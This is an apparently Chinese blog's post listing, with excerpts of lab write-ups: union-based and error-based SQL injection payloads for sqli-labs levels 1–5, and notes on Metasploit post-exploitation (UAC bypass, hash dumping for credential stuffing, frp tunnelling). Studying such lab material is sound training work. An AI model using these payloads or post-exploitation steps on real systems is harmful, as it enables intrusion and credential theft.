- 博客(7)
- 收藏
- 关注
原创 python自己装模块
https://pypi.org/ 下载对应模块然后打开python文件夹目录下的:Lib\site-packages把模块解压到这里
2021-09-15 21:58:17
87
原创 sqli_libs第五关
第五关第一种:非常复杂,我也没太搞明白order by 3正常,order by 4异常’ union SELECT null,count(*),concat((select database()),floor(rand()*2))as a from information_schema.tables group by a–+查数据库名union SELECT null,count(*),concat((select table_name from information_schema.table
2021-07-24 21:54:29
184
原创 sqli_labs第四关
第四关http://121.196.164.91:7001/Less-4/?id=-1%22)%20union%20select%201,2,concat_ws(%27~~%27,database(),user(),version())–+爆出数据库信息http://121.196.164.91:7001/Less-4/?id=-1%22)%20%20union%20select%201,2,group_concat(table_name)%20from%20information_schema.ta
2021-07-24 14:55:49
102
原创 sqli_labs第3关
第三关和以前不同的是第三关用括号闭合,加个1’)就行了,其他一样http://121.196.164.91:7001/Less-3/?id=1%27)%20union%20select%201,2,3–+http://121.196.164.91:7001/Less-3/?id=-1%27)%20union%20select%201,2,group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=
2021-07-24 14:38:30
111
原创 sqli-labs第1-2关
第一关字符型注入,加单引号报错,需要闭合来注入直接上语句:?id=-1’ union select 1,2,concat_ws(char(32,58,32),user(),database(),version()) --+concat_ws 可以无限查询,中间可以插入很多要查的东西,第一个是占位符,可以用~代替也行id=-1’ union select 1,2,group_concat(table_name) from information_schema.tables where table_
2021-07-24 13:22:21
138
2
原创 msf代理进内网
思路:拿到shell之后先获取最高权限,方法uac绕过提权然后获取hash,以后用于批量撞库啥的解决shell内乱码:chcp 65001(在cmd内输入,需要在旧版本的kali输入命令界面的编辑,首选项,编码里改成gbk,新版的没找到改编码的地方,有大佬知道的教教我吧)msf内网穿透进公网,cs传shell给msf1.msf内网穿透进公网,cs传给msf shelllinux: ./frpc -f *******85a82:1454793windows:frpc_windows_amd64
2021-07-12 21:09:26
1758
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人